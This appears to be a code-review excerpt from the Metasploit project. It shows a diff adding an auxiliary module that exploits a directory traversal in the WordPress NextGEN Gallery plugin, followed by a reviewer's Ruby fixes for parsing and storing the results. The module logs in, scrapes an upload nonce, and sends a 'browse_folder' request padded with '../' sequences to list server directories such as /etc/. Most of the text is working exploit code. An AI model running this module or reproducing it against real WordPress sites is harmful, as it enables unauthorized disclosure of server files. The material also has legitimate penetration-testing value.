modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb

```diff
@@ -0,0 +1,141 @@
+        [
+          'Sathish Kumar', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('WP_USER', [true, 'A valid username', nil]),
+        OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),
+        OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])
+      ], self.class)
+  end
+
+  def user
+    datastore['WP_USER']
+  end
+
+  def password
+    datastore['WP_PASS']
+  end
+
+  def check
+    check_plugin_version_from_readme('nextgen-gallery', '2.1.9')
+  end
+
+  def get_nonce(cookie)
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_backend, 'admin.php'),
+      'method' => 'GET',
+      'vars_get'  => {
+        'page'    => 'ngg_addgallery'
+      },
+      'cookie' => cookie
+    )
+
+    if res && res.redirect? && res.redirection
+      location = res.redirection
+      print_status("#{peer} - Following redirect to #{location}")
+      res = send_request_cgi(
+        'uri'    => location,
+        'method' => 'GET',
+        'cookie' => cookie
+      )
+    end
+
+    res.body.scan(/var browse_params = {"nextgen_upload_image_sec":"(.+)"};/).flatten.first
+  end
+
+  def run_host(ip)
+    vprint_status("#{peer} - Trying to login as: #{user}")
+    cookie = wordpress_login(user, password)
+    if cookie.nil?
+      print_error("#{peer} - Unable to login as: #{user}")
+      return
+    end
+
+    vprint_status("#{peer} - Trying to get nonce...")
+    nonce = get_nonce(cookie)
+    if nonce.nil?
+      print_error("#{peer} - Can not get nonce after login")
+      return
+    end
+    vprint_status("#{peer} - Got nonce: #{nonce}")
+
+    traversal = "../" * datastore['DEPTH']
+    filename = datastore['DIRPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
+      'headers'   => {
+        'Referer' => "http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery",
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_get'  => {
+        'photocrati_ajax' => '1'
+      },
+      'vars_post' => {
+        'nextgen_upload_image_sec' => "#{nonce}",
+        'action' => 'browse_folder',
+        'dir' => "#{traversal}#{filename}"
+      },
+      'cookie'    => cookie
+    )
+
+    if res && res.code == 200 && res.body && res.body.to_s.length > 0
+      begin
+        results = JSON.parse(res.body)['html']
+      rescue JSON::ParserError
+        vprint_error("#{peer} - Unable to parse JSON")
+        return
+      end
+
+      res_new = results.gsub(/<u(.*)>/, '').gsub(/<\/ul>/, '').gsub(/<l(.*)"\/..\/..\/..\/../, '').gsub(/"(.*)i>/, '')
```

Comment:
@espreto here you go:

1 - require these:

```
require 'json'
require 'nokogiri'
```

2 - Add this method:

```ruby
  def parse_paths(res)
    begin
      j = JSON.parse(res.body)
    rescue JSON::ParserError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      return []
    end

    html = j['html']
    noko = Nokogiri::HTML(html)
    links = noko.search('a')
    links.collect { |e| normalize_uri("#{datastore['FILEPATH']}/#{e.text}") }
  end
```

3. And then make sure to update the store_loot call:

```ruby
      paths = parse_paths(res)
      path = store_loot(
        'nextgen.traversal',
        'text/plain',
        ip,
        paths,
        fname
      )
```

You can also see my version of the source here:
https://gist.github.com/wchen-r7/6beb62dcd727444026b9